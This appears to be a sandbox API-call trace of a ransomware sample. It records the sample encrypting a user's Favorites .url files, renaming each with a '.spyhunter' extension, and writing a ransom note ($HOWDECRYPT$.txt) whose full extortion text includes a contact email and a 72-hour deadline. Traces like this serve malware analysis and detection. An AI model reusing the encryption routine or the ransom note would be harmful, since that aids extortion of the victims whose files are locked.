[0148.452] GetProcessHeap () returned 0x2c0000 [0148.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.452] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef84, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef84*=0x85, lpOverlapped=0x0) returned 1 [0148.453] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.453] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248ef84, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef84*=0x85, lpOverlapped=0x0) returned 1 [0148.453] GetProcessHeap () returned 0x2c0000 [0148.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.453] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.453] WriteFile (in: hFile=0x9c, lpBuffer=0x248efc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef84, lpOverlapped=0x0 | out: lpBuffer=0x248efc4*, lpNumberOfBytesWritten=0x248ef84*=0x4, lpOverlapped=0x0) returned 1 [0148.453] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef84, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef84*=0x30, lpOverlapped=0x0) returned 1 [0148.453] CloseHandle (hObject=0x9c) returned 1 [0148.453] GetProcessHeap () returned 0x2c0000 [0148.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.453] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.spyhunter") returned 74 [0148.454] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.spyhunter")) returned 1 [0148.456] GetProcessHeap () returned 0x2c0000 [0148.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.456] GetProcessHeap () returned 0x2c0000 [0148.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.456] GetProcessHeap () returned 0x2c0000 [0148.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5dd8 | out: hHeap=0x2c0000) returned 1 [0148.456] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248efc8 | out: pbBuffer=0x248efc8) returned 1 [0148.456] GetProcessHeap () returned 0x2c0000 [0148.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.456] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248efc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248efc0*=0x30) returned 1 [0148.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.457] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 71 [0148.457] StrStrW (lpFirst="MSN Sports.url", lpSrch=".txt") returned 0x0 [0148.457] GetProcessHeap () returned 0x2c0000 [0148.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.457] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef84, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef84*=0x85, lpOverlapped=0x0) returned 1 [0148.458] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.458] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248ef84, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef84*=0x85, lpOverlapped=0x0) returned 1 [0148.458] GetProcessHeap () returned 0x2c0000 [0148.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.458] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.458] WriteFile (in: hFile=0x9c, lpBuffer=0x248efc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef84, lpOverlapped=0x0 | out: lpBuffer=0x248efc4*, lpNumberOfBytesWritten=0x248ef84*=0x4, lpOverlapped=0x0) returned 1 [0148.458] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef84, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef84*=0x30, lpOverlapped=0x0) returned 1 [0148.458] CloseHandle (hObject=0x9c) returned 1 [0148.458] GetProcessHeap () returned 0x2c0000 [0148.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.458] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.spyhunter") returned 81 [0148.458] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.spyhunter")) returned 1 [0148.459] GetProcessHeap () returned 0x2c0000 [0148.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.459] GetProcessHeap () returned 0x2c0000 [0148.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.459] GetProcessHeap () returned 0x2c0000 [0148.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80e80 | out: hHeap=0x2c0000) returned 1 [0148.459] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248efc0 | out: pbBuffer=0x248efc0) returned 1 [0148.459] GetProcessHeap () returned 0x2c0000 [0148.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.459] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248efb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248efb8*=0x30) returned 1 [0148.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.460] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0148.460] StrStrW (lpFirst="MSN Money.url", lpSrch=".txt") returned 0x0 [0148.460] GetProcessHeap () returned 0x2c0000 [0148.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.460] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef7c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef7c*=0x85, lpOverlapped=0x0) returned 1 [0148.461] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.461] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248ef7c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef7c*=0x85, lpOverlapped=0x0) returned 1 [0148.461] GetProcessHeap () returned 0x2c0000 [0148.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.461] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.461] WriteFile (in: hFile=0x9c, lpBuffer=0x248efbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef7c, lpOverlapped=0x0 | out: lpBuffer=0x248efbc*, lpNumberOfBytesWritten=0x248ef7c*=0x4, lpOverlapped=0x0) returned 1 [0148.462] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef7c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef7c*=0x30, lpOverlapped=0x0) returned 1 [0148.462] CloseHandle (hObject=0x9c) returned 1 [0148.462] GetProcessHeap () returned 0x2c0000 [0148.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.462] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.spyhunter") returned 80 [0148.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.spyhunter")) returned 1 [0148.462] GetProcessHeap () returned 0x2c0000 [0148.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.463] GetProcessHeap () returned 0x2c0000 [0148.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.463] GetProcessHeap () returned 0x2c0000 [0148.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81b28 | out: hHeap=0x2c0000) returned 1 [0148.463] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248efc0 | out: pbBuffer=0x248efc0) returned 1 [0148.463] GetProcessHeap () returned 0x2c0000 [0148.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.463] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248efb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248efb8*=0x30) returned 1 [0148.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.464] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0148.464] StrStrW (lpFirst="MSN Entertainment.url", lpSrch=".txt") returned 0x0 [0148.464] GetProcessHeap () returned 0x2c0000 [0148.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.464] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef7c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef7c*=0x85, lpOverlapped=0x0) returned 1 [0148.465] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.465] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248ef7c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef7c*=0x85, lpOverlapped=0x0) returned 1 [0148.465] GetProcessHeap () returned 0x2c0000 [0148.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.465] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.465] WriteFile (in: hFile=0x9c, lpBuffer=0x248efbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef7c, lpOverlapped=0x0 | out: lpBuffer=0x248efbc*, lpNumberOfBytesWritten=0x248ef7c*=0x4, lpOverlapped=0x0) returned 1 [0148.465] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef7c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef7c*=0x30, lpOverlapped=0x0) returned 1 [0148.465] CloseHandle (hObject=0x9c) returned 1 [0148.466] GetProcessHeap () returned 0x2c0000 [0148.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.466] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.spyhunter") returned 88 [0148.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.spyhunter")) returned 1 [0148.466] GetProcessHeap () returned 0x2c0000 [0148.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.466] GetProcessHeap () returned 0x2c0000 [0148.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.466] GetProcessHeap () returned 0x2c0000 [0148.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f788 | out: hHeap=0x2c0000) returned 1 [0148.467] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248efb8 | out: pbBuffer=0x248efb8) returned 1 [0148.467] GetProcessHeap () returned 0x2c0000 [0148.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.467] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248efb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248efb0*=0x30) returned 1 [0148.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.467] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0148.467] StrStrW (lpFirst="MSN Autos.url", lpSrch=".txt") returned 0x0 [0148.467] GetProcessHeap () returned 0x2c0000 [0148.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.467] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef74*=0x85, lpOverlapped=0x0) returned 1 [0148.468] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.468] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248ef74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef74*=0x85, lpOverlapped=0x0) returned 1 [0148.468] GetProcessHeap () returned 0x2c0000 [0148.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.468] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.468] WriteFile (in: hFile=0x9c, lpBuffer=0x248efb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef74, lpOverlapped=0x0 | out: lpBuffer=0x248efb4*, lpNumberOfBytesWritten=0x248ef74*=0x4, lpOverlapped=0x0) returned 1 [0148.469] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef74, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef74*=0x30, lpOverlapped=0x0) returned 1 [0148.469] CloseHandle (hObject=0x9c) returned 1 [0148.469] GetProcessHeap () returned 0x2c0000 [0148.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.469] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.spyhunter") returned 80 [0148.469] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.spyhunter")) returned 1 [0148.469] GetProcessHeap () returned 0x2c0000 [0148.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.470] GetProcessHeap () returned 0x2c0000 [0148.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.470] GetProcessHeap () returned 0x2c0000 [0148.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81978 | out: hHeap=0x2c0000) returned 1 [0148.470] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.471] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0148.471] WriteFile (in: hFile=0x9c, lpBuffer=0x248eeeb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f014, lpOverlapped=0x0 | out: lpBuffer=0x248eeeb*, lpNumberOfBytesWritten=0x248f014*=0x127, lpOverlapped=0x0) returned 1 [0148.471] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0148.471] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f014, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f014*=0x2ac, lpOverlapped=0x0) returned 1 [0148.472] CloseHandle (hObject=0x9c) returned 1 [0148.472] GetProcessHeap () returned 0x2c0000 [0148.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f6a0 | out: hHeap=0x2c0000) returned 1 [0148.472] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248efb0 | out: pbBuffer=0x248efb0) returned 1 [0148.472] GetProcessHeap () returned 0x2c0000 [0148.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.472] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248efa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248efa8*=0x30) returned 1 [0148.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.472] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0148.472] StrStrW (lpFirst="Microsoft Store.url", lpSrch=".txt") returned 0x0 [0148.473] GetProcessHeap () returned 0x2c0000 [0148.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.473] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef6c*=0x86, lpOverlapped=0x0) returned 1 [0148.473] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.473] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x86, lpNumberOfBytesWritten=0x248ef6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef6c*=0x86, lpOverlapped=0x0) returned 1 [0148.473] GetProcessHeap () returned 0x2c0000 [0148.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.474] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.474] WriteFile (in: hFile=0x9c, lpBuffer=0x248efac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef6c, lpOverlapped=0x0 | out: lpBuffer=0x248efac*, lpNumberOfBytesWritten=0x248ef6c*=0x4, lpOverlapped=0x0) returned 1 [0148.474] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef6c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef6c*=0x30, lpOverlapped=0x0) returned 1 [0148.474] CloseHandle (hObject=0x9c) returned 1 [0148.474] GetProcessHeap () returned 0x2c0000 [0148.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.474] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.spyhunter") returned 92 [0148.474] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.spyhunter")) returned 1 [0148.475] GetProcessHeap () returned 0x2c0000 [0148.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.475] 